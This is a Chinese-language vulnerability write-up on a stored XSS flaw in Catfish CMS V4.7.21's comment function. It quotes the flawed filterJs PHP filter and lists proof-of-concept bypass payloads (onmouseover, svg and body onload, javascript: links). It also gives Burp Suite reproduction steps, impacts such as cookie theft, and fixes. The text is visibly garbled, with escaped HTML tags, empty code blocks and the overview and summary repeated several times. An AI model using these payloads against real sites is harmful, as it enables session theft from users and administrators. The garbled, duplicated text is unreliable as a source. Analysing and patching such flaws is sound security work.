Catfish CMS V4.7.21 存储型XSS漏洞分析与利用<\/h1>

漏洞概述<\/h2>
Catfish CMS（鲶鲶鱼CMS）V4.7.21版本中存在一个存储型跨站脚本(XSS)漏洞，该漏洞位于评论功能处，由于过滤函数`filterJs<\/code>存在缺陷，导致攻击者可以绕过过滤注入恶意JavaScript代码。<\/p>`

漏洞位置<\/h2>
漏洞存在于以下文件中：<\/p>
\application\index\controller\Index.php
<\/code><\/pre>
具体函数为pinglun()<\/code>方法中的评论处理逻辑。<\/p>
漏洞分析<\/h2>
关键代码<\/h3>
public<\/span> function<\/span> pinglun<\/span>() {
<\/span><\/span>    \/\/ ...省略部分代码...
<\/span><\/span><\/span><\/span>    $data =<\/span> [
<\/span><\/span>        'post_id'<\/span> =><\/span> Request<\/span>::<\/span>instance<\/span>()-><\/span>post<\/span>('id'<\/span>),
<\/span><\/span>        'url'<\/span> =><\/span> 'index\/Index\/article\/id\/'<\/span>.<\/span>Request<\/span>::<\/span>instance<\/span>()-><\/span>post<\/span>('id'<\/span>),
<\/span><\/span>        'uid'<\/span> =><\/span> Session<\/span>::<\/span>get<\/span>($this-><\/span>session_prefix<\/span>.<\/span>'user_id'<\/span>),
<\/span><\/span>        'to_uid'<\/span> =><\/span> $beipinglunren['post_author'<\/span>],
<\/span><\/span>        'createtime'<\/span> =><\/span> date<\/span>("Y-m-d H:i:s"<\/span>),
<\/span><\/span>        'content'<\/span> =><\/span> $this-><\/span>filterJs<\/span>(Request<\/span>::<\/span>instance<\/span>()-><\/span>post<\/span>('pinglun'<\/span>)), \/\/ 漏洞点
<\/span><\/span><\/span><\/span>        'status'<\/span> =><\/span> $plzt
<\/span><\/span>    ];
<\/span><\/span>    Db<\/span>::<\/span>name<\/span>('comments'<\/span>)-><\/span>insert<\/span>($data);
<\/span><\/span>    \/\/ ...省略部分代码...
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>过滤函数分析<\/h3>
protected<\/span> function<\/span> filterJs<\/span>($str) {
<\/span><\/span>    while<\/span>(stripos<\/span>($str,'<script'<\/span>) !==<\/span> false<\/span> ||<\/span> stripos<\/span>($str,'<style'<\/span>) !==<\/span> false<\/span> ||<\/span> stripos<\/span>($str,'<iframe'<\/span>) !==<\/span> false<\/span> ||<\/span> stripos<\/span>($str,'<frame'<\/span>) !==<\/span> false<\/span> ||<\/span> stripos<\/span>($str,'onclick'<\/span>) !==<\/span> false<\/span>) {
<\/span><\/span>        $str =<\/span> preg_replace<\/span>([
<\/span><\/span>            '\/<script[\s\S]*?<\\/script[\s]*>\/i'<\/span>,
<\/span><\/span>            '\/<style[\s\S]*?<\\/style[\s]*>\/i'<\/span>,
<\/span><\/span>            '\/<iframe[\s\S]*?[<\\/iframe|\\/][\s]*>\/i'<\/span>,
<\/span><\/span>            '\/<frame[\s\S]*?[<\\/frame|\\/][\s]*>\/i'<\/span>,
<\/span><\/span>            '\/on[A-Za-z]+[\s]*=[\s]s\S]i'<\/span>
<\/span><\/span>        ],''<\/span>,$str);
<\/span><\/span>    }
<\/span><\/span>    return<\/span> $str;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>过滤缺陷<\/h3>


正则表达式错误<\/strong>：最后一个正则表达式\/on[A-Za-z]+[\s]*=[\s]s\S]i<\/code>存在语法错误，无法正确匹配所有on事件属性。<\/p>
<\/li>

过滤不全面<\/strong>：仅过滤了<script><\/code>、<style><\/code>、<iframe><\/code>、<frame><\/code>标签和onclick<\/code>事件，其他HTML标签和事件处理器（如onerror<\/code>、onmouseover<\/code>等）未被有效过滤。<\/p>
<\/li>
<\/ol>
绕过方法<\/h2>
有效Payload示例<\/h3>

使用img标签的onerror事件：<\/li>
<\/ol>

<\/span><\/span><\/code><\/pre>
使用p标签的onmouseover事件：<\/li>
<\/ol>
<p<\/span> onmouseover<\/span>=<\/span>"javascript:alert(1);"<\/span>>M<\/p<\/span>>
<\/span><\/span><\/code><\/pre>
其他可能的绕过方式：<\/li>
<\/ol>
<svg<\/span>\/<\/span>onload<\/span>=<\/span>alert(1)<\/span>>
<\/span><\/span><body<\/span> onload<\/span>=<\/span>alert(1)<\/span>>
<\/span><\/span><a<\/span> href<\/span>=<\/span>javascript:alert(1)<\/span>>click<\/a<\/span>>
<\/span><\/span><\/code><\/pre>漏洞验证步骤<\/h2>


注册用户<\/strong>：首先需要注册一个普通用户账号并登录系统。<\/p>
<\/li>

发表评论<\/strong>：找到可以评论的文章，准备提交评论。<\/p>
<\/li>

拦截请求<\/strong>：使用Burp Suite等工具拦截评论提交的POST请求。<\/p>
<\/li>

修改评论内容<\/strong>：将评论内容替换为XSS payload，例如：<\/p>
<\/li>
<\/ol>

<\/span><\/span><\/code><\/pre>

提交请求<\/strong>：放行修改后的请求。<\/p>
<\/li>

触发XSS<\/strong>：<\/p>

普通用户浏览包含恶意评论的文章时触发<\/li>
管理员在后台查看评论时触发<\/li>
<\/ul>
<\/li>
<\/ol>
漏洞影响<\/h2>

窃取用户凭证<\/strong>：攻击者可窃取登录用户的会话cookie。<\/li>
钓鱼攻击<\/strong>：伪造登录表单诱导用户输入凭证。<\/li>
恶意重定向<\/strong>：将用户重定向到恶意网站。<\/li>
蠕虫传播<\/strong>：如果结合CSRF漏洞，可能实现自我传播。<\/li>
<\/ol>
修复建议<\/h2>

完善过滤函数<\/strong>：<\/li>
<\/ol>
protected<\/span> function<\/span> filterJs<\/span>($str) {
<\/span><\/span>    \/\/ 移除所有HTML标签
<\/span><\/span><\/span><\/span>    $str =<\/span> strip_tags<\/span>($str);
<\/span><\/span>    \/\/ 编码特殊字符
<\/span><\/span><\/span><\/span>    $str =<\/span> htmlspecialchars<\/span>($str, ENT_QUOTES<\/span>, 'UTF-8'<\/span>);
<\/span><\/span>    return<\/span> $str;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>

使用内容安全策略(CSP)<\/strong>：添加HTTP头限制脚本执行来源。<\/p>
<\/li>

输入验证<\/strong>：对用户输入进行严格的白名单验证。<\/p>
<\/li>

输出编码<\/strong>：在输出用户提供的内容时进行HTML实体编码。<\/p>
<\/li>
<\/ol>
总结<\/h2>
该漏洞源于不完善的输入过滤机制，通过构造特定的HTML标签和事件处理器可以绕过过滤。开发人员应当采用更严格的安全措施，如白名单过滤、输出编码等，以防止此类XSS漏洞的发生。<\/p>

Catfish CMS V4.7.21 存储型XSS漏洞分析与利用<\/h1>

漏洞概述<\/h2> Catfish CMS（鲶鲶鱼CMS）V4.7.21版本中存在一个存储型跨站脚本(XSS)漏洞，该漏洞位于评论功能处，由于过滤函数filterJs<\/code>存在缺陷，导致攻击者可以绕过过滤注入恶意JavaScript代码。<\/p>

总结<\/h2> 该漏洞源于不完善的输入过滤机制，通过构造特定的HTML标签和事件处理器可以绕过过滤。开发人员应当采用更严格的安全措施，如白名单过滤、输出编码等，以防止此类XSS漏洞的发生。<\/p>

漏洞概述<\/h2>
Catfish CMS（鲶鲶鱼CMS）V4.7.21版本中存在一个存储型跨站脚本(XSS)漏洞，该漏洞位于评论功能处，由于过滤函数`filterJs<\/code>存在缺陷，导致攻击者可以绕过过滤注入恶意JavaScript代码。<\/p>`

总结<\/h2>
该漏洞源于不完善的输入过滤机制，通过构造特定的HTML标签和事件处理器可以绕过过滤。开发人员应当采用更严格的安全措施，如白名单过滤、输出编码等，以防止此类XSS漏洞的发生。<\/p>